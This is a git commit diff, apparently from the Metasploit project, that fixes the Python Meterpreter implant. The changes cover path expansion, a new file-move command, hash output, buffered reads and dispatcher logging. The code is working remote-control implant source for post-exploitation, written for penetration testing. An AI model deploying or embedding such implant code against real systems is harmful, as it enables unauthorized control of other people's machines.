Land #2349 pymeterp fixes

bug/bundler_fix sprint-C02
James Lee 2013-09-10 16:42:58 -05:00
commit 6ba9693d5d
No known key found for this signature in database
GPG Key ID: 2D6094C7CEA0A321
2 changed files with 26 additions and 13 deletions

View File

@ -580,20 +580,28 @@ def stdapi_fs_delete_file(request, response):
@meterpreter.register_function @meterpreter.register_function
def stdapi_fs_file_expand_path(request, response): def stdapi_fs_file_expand_path(request, response):
path_tlv = packet_get_tlv(request, TLV_TYPE_FILE_PATH)['value'] path_tlv = packet_get_tlv(request, TLV_TYPE_FILE_PATH)['value']
if path_tlv == '%COMSPEC%': if has_windll:
if platform.system() == 'Windows': path_out = (ctypes.c_char * 4096)()
result = 'cmd.exe' path_out_len = ctypes.windll.kernel32.ExpandEnvironmentStringsA(path_tlv, ctypes.byref(path_out), ctypes.sizeof(path_out))
else: result = ''.join(path_out)[:path_out_len]
elif path_tlv == '%COMSPEC%':
result = '/bin/sh' result = '/bin/sh'
elif path_tlv in ['%TEMP%', '%TMP%'] and platform.system() != 'Windows': elif path_tlv in ['%TEMP%', '%TMP%']:
result = '/tmp' result = '/tmp'
else: else:
result = os.getenv(path_tlv) result = os.getenv(path_tlv, path_tlv)
if not result: if not result:
return ERROR_FAILURE, response return ERROR_FAILURE, response
response += tlv_pack(TLV_TYPE_FILE_PATH, result) response += tlv_pack(TLV_TYPE_FILE_PATH, result)
return ERROR_SUCCESS, response return ERROR_SUCCESS, response
@meterpreter.register_function
def stdapi_fs_file_move(request, response):
oldname = packet_get_tlv(request, TLV_TYPE_FILE_NAME)['value']
newname = packet_get_tlv(request, TLV_TYPE_FILE_PATH)['value']
os.rename(oldname, newname)
return ERROR_SUCCESS, response
@meterpreter.register_function @meterpreter.register_function
def stdapi_fs_getwd(request, response): def stdapi_fs_getwd(request, response):
response += tlv_pack(TLV_TYPE_DIRECTORY_PATH, os.getcwd()) response += tlv_pack(TLV_TYPE_DIRECTORY_PATH, os.getcwd())
@ -622,7 +630,7 @@ def stdapi_fs_md5(request, response):
m = hashlib.md5() m = hashlib.md5()
path = packet_get_tlv(request, TLV_TYPE_FILE_PATH)['value'] path = packet_get_tlv(request, TLV_TYPE_FILE_PATH)['value']
m.update(open(path, 'rb').read()) m.update(open(path, 'rb').read())
response += tlv_pack(TLV_TYPE_FILE_NAME, m.hexdigest()) response += tlv_pack(TLV_TYPE_FILE_NAME, m.digest())
return ERROR_SUCCESS, response return ERROR_SUCCESS, response
@meterpreter.register_function @meterpreter.register_function
@ -669,7 +677,7 @@ def stdapi_fs_sha1(request, response):
m = hashlib.sha1() m = hashlib.sha1()
path = packet_get_tlv(request, TLV_TYPE_FILE_PATH)['value'] path = packet_get_tlv(request, TLV_TYPE_FILE_PATH)['value']
m.update(open(path, 'rb').read()) m.update(open(path, 'rb').read())
response += tlv_pack(TLV_TYPE_FILE_NAME, m.hexdigest()) response += tlv_pack(TLV_TYPE_FILE_NAME, m.digest())
return ERROR_SUCCESS, response return ERROR_SUCCESS, response
@meterpreter.register_function @meterpreter.register_function

View File

@ -145,8 +145,9 @@ class STDProcessBuffer(threading.Thread):
self.data_lock.acquire() self.data_lock.acquire()
self.data += byte self.data += byte
self.data_lock.release() self.data_lock.release()
data = self.std.read()
self.data_lock.acquire() self.data_lock.acquire()
self.data += self.std.read() self.data += data
self.data_lock.release() self.data_lock.release()
def is_read_ready(self): def is_read_ready(self):
@ -208,7 +209,7 @@ class PythonMeterpreter(object):
def run(self): def run(self):
while self.running: while self.running:
if len(select.select([self.socket], [], [], 0)[0]): if len(select.select([self.socket], [], [], 0.5)[0]):
request = self.socket.recv(8) request = self.socket.recv(8)
if len(request) != 8: if len(request) != 8:
break break
@ -391,13 +392,17 @@ class PythonMeterpreter(object):
reqid_tlv = packet_get_tlv(request, TLV_TYPE_REQUEST_ID) reqid_tlv = packet_get_tlv(request, TLV_TYPE_REQUEST_ID)
resp += tlv_pack(reqid_tlv) resp += tlv_pack(reqid_tlv)
if method_tlv['value'] in self.extension_functions: handler_name = method_tlv['value']
handler = self.extension_functions[method_tlv['value']] if handler_name in self.extension_functions:
handler = self.extension_functions[handler_name]
try: try:
#print("[*] running method {0}".format(handler_name))
result, resp = handler(request, resp) result, resp = handler(request, resp)
except Exception, err: except Exception, err:
#print("[-] method {0} resulted in an error".format(handler_name))
result = ERROR_FAILURE result = ERROR_FAILURE
else: else:
#print("[-] method {0} was requested but does not exist".format(handler_name))
result = ERROR_FAILURE result = ERROR_FAILURE
resp += tlv_pack(TLV_TYPE_RESULT, result) resp += tlv_pack(TLV_TYPE_RESULT, result)
resp = struct.pack('>I', len(resp) + 4) + resp resp = struct.pack('>I', len(resp) + 4) + resp